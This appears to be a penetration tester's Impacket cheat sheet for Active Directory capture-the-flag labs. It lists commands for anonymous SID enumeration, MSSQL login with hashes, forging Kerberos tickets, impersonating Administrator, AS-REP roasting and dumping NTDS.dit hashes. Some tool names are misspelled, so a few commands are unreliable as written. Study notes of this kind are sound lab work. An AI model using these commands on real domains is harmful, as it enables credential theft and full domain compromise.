Impacket

User Enumeration

Desciption : Look for user , domain SID

1. Anonymous lookup

impacket-lookupsid sequel.thb/anonymous@dc.sequel.htb -no-pass

OR

impacket-lookupsid sequel.thb/anonymous@$ip -no-pass

1. With Creds

impacket-samrdump nara-security.com/tracy.white:password@$ip

---

Mssqlcient - Port: 1433

Description : use to connect with MSSQL

Authentication

1. Basic

impacket-mssqlcient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb

impacket-mssqlcient PublicUser:GuestUserCantWrite1@sequel.htb

1. Specific AD domain authentication :-

impacket-mssqlcient -windows-auth PublicUser:GuestUserCantWrite1@sequel.htb

1. NTLM hash authentication

python3 mssqlclient.py 'DOMAIN/username@hostname -windows-auth -hashes :<NTLM hash>'

Impacket-Ticketer

Generates forged Kerberos tickets using NTLM hash without interacting with the KDC.

Prerequisites to create:

• TGT = krbtgt hash

• TGS = service account hash

service accounts appears like : SVC_MSSQL | SVC_WebAdmin

impacket-ticketer -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn doesnotmatter/dc.sequel.htb administrator

Impacket-getST

It creates service ticket TGS only by connecting to KDC using the TGT (real or forged)

Prerequisites : TGT (real or forged)

impacket-getST -spn cifs/resourcedc.resourced.local -impersonate Administrator resourced/r4j3sh\\$:'Rajesh@Mondal' -dc-ip 192.168.239.175

Impacket-getNPuser (No access : check username with hash)

Description : Performs AS Rep-Roast attack (check kerberos pre-auth disabled)

• -k - kerberos authentication

• -no-pass - no password

1. without username

GetNPUsers.py domain-name.local/ -dc-ip 10.10.10.161 -request

1. with username

impacket-GetNPUsers -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams

Impacket-secretdump (Dump hashes from NTDS.dit)

Prerequisite = ntds.dit file

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL